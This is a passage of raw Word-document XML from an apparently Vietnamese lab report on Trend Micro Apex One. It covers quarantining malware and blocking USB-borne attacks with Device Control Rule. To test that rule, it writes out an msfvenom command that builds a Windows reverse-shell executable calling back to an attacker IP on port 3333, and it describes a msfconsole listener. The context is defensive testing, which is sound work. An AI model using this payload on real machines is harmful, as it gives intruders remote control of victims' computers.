          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thử download lại Malware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3333FDBF" w14:textId="612CBED9" w:rsidR="001564BA" w:rsidRPr="008D31C5" w:rsidRDefault="006C1013" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1013">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CA28199" wp14:editId="61DBF19A">
            <wp:extent cx="5715000" cy="3622040"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="16510"/>
            <wp:docPr id="440431741" name="Picture 44043174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1741" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, Trang web, Website&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3622040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE18A2F" w14:textId="1FAC1A71" w:rsidR="008A7E48" w:rsidRPr="0075136C" w:rsidRDefault="008A7E48" w:rsidP="0075136C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lúc này malware đã bị qua</w:t>
      </w:r>
      <w:r w:rsidR="00FD0CDA" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">rantined (cách ly), đây là kết quả sau khi </w:t>
      </w:r>
      <w:r w:rsidR="00396FA7" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>được sử lý bằng Machine learning đối với những loại malware không có trong signature</w:t>
      </w:r>
      <w:r w:rsidR="00EF737B" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B6D6F" w14:textId="2B638DA9" w:rsidR="00E31ADF" w:rsidRPr="001B14DB" w:rsidRDefault="00186294" w:rsidP="0075136C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc152795844"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ngăn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> chặn các </w:t>
      </w:r>
      <w:r w:rsidR="00C32DCF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>cuộc tấn công từ thiết bị lưu trữ ngoài</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0A156748" w14:textId="4DA9189D" w:rsidR="00294234" w:rsidRPr="0004418A" w:rsidRDefault="004F1ADD" w:rsidP="0075136C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Các</w:t>
      </w:r>
      <w:r w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> thiết bị lưu trữ ngoài như USB</w:t>
      </w:r>
      <w:r w:rsidR="00916854" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00653173" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">thường nhỏ và </w:t>
      </w:r>
      <w:r w:rsidR="00FB6F74" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">dễ </w:t>
      </w:r>
      <w:r w:rsidR="003C48E4" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>vẫn chuyển</w:t>
      </w:r>
      <w:r w:rsidR="00A214AB" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005317B5" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Vì thế</w:t>
      </w:r>
      <w:r w:rsidR="00A214AB" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> kẻ xấu có thể sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00C57F99" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">để đánh cắp dữ liệu bằng cách sao chép từ máy của </w:t>
      </w:r>
      <w:r w:rsidR="009A381F" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tổ chức</w:t>
      </w:r>
      <w:r w:rsidR="00F738EB" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005317B5" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hoặc có thể phát tán mã độc được cài đặt sẵn trên các thiết bị lưu trữ </w:t>
      </w:r>
      <w:r w:rsidR="009C796B" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">ngoài hay từ máy này sang máy khác </w:t>
      </w:r>
      <w:r w:rsidR="00097717" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">khi sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="004A26DD" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>các thiết bị này trên nhiều máy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56829FED" w14:textId="11858ED0" w:rsidR="004A63EF" w:rsidRPr="0075136C" w:rsidRDefault="00EC7120" w:rsidP="0075136C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Apex One có khả năng ngăn chặn </w:t>
      </w:r>
      <w:r w:rsidR="0013138B" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">rủi ro trên bằng cách </w:t>
      </w:r>
      <w:r w:rsidR="001B5750" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">cấp phép </w:t>
      </w:r>
      <w:r w:rsidR="004A63EF" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>các thiết bị lưu trữ ngoài bằng Device Control Rule.</w:t>
      </w:r>
      <w:r w:rsidR="00502503" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Để </w:t>
      </w:r>
      <w:r w:rsidR="00911FC8" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00502503" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tính năng này</w:t>
      </w:r>
      <w:r w:rsidR="003A064E" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00502503" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhóm </w:t>
      </w:r>
      <w:r w:rsidR="00B92006" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">đã thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="008A6F0D" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">tấn công reverse shell </w:t>
      </w:r>
      <w:r w:rsidR="0024716E" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">khi cắm </w:t>
      </w:r>
      <w:r w:rsidR="002F1EF1" w:rsidRPr="0075136C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>USB vào máy nạn nhân, sau đó sử dụng Apex để ngăn chặn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381388F8" w14:textId="6FC176C7" w:rsidR="002F1EF1" w:rsidRDefault="00DA63B2" w:rsidP="0075136C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Đầu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thực hiện tạo payload trên máy Attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11300CA9" w14:textId="7F1F4B7F" w:rsidR="005E5A10" w:rsidRPr="00F97D30" w:rsidRDefault="005E5A10"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 xml:space="preserve">Tạo payload bằng tool msfvenom như sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70203DDA" w14:textId="5583612B" w:rsidR="00DA63B2" w:rsidRDefault="005E5A10" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01F6F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom -p windows/</w:t>
      </w:r>
      <w:r w:rsidR="00AE621E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00AE621E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00AE621E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="00AE621E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01F6F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=10.81.23.100 LPORT=</w:t>
      </w:r>
      <w:r w:rsidR="00350FE6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3333</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01F6F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-f exe -o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01F6F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shell_reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24E4C2" w14:textId="4C65EF6A" w:rsidR="00C1316E" w:rsidRDefault="00CC755F" w:rsidP="0075136C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC755F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F6A339" wp14:editId="6897A4C0">
            <wp:extent cx="5943600" cy="2621280"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
            <wp:docPr id="81201214" name="Picture 81201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214" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2621280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E38DBA" w14:textId="480160EC" w:rsidR="00361E15" w:rsidRPr="00F97D30" w:rsidRDefault="00361E15" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload nhằm tạo ra 1 reverse shell bằng file thực thi exe với tên là  shell_reverse.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C665F" w14:textId="3254694C" w:rsidR="00FD2B97" w:rsidRPr="00F97D30" w:rsidRDefault="00361E15" w:rsidP="0075136C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Trong payload, LHOST và LPORT chính là IP và Port được mở để lắng nghe kết nối trên máy Attacker</w:t>
      </w:r>
      <w:r w:rsidR="009E10EB" w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900A347" w14:textId="77777777" w:rsidR="00643273" w:rsidRPr="00AF0D8F" w:rsidRDefault="00643273" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0D8F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Thực hiện exploit và đợi kết nối từ máy Victim (Endpoint):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CF507" w14:textId="2204E6B8" w:rsidR="00C107CD" w:rsidRPr="00F97D30" w:rsidRDefault="00643273" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sử dụng tool msfconsole để thực hiện tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D85345" w14:textId="392C9C4B" w:rsidR="00AF0D8F" w:rsidRPr="00F97D30" w:rsidRDefault="00AF0D8F" w:rsidP="00F97D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Set LHOST và LPORT là địa chỉ IP và PORT của Attacker để tiến hành lắng nghe, sau đó exploit, lúc này máy Attacker đang thực hiện lắng nghe kết nối trên port 3333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34523089" w14:textId="70993E83" w:rsidR="00E17ECC" w:rsidRDefault="00E17ECC" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E17ECC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42002C83" wp14:editId="17FCC2A4">
            <wp:extent cx="5943600" cy="480060"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="667706902" name="Picture 6677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6902" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="480060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF73701" w14:textId="4ADFA12B" w:rsidR="00FD2B97" w:rsidRDefault="00872D56" w:rsidP="00F97D30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872D56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
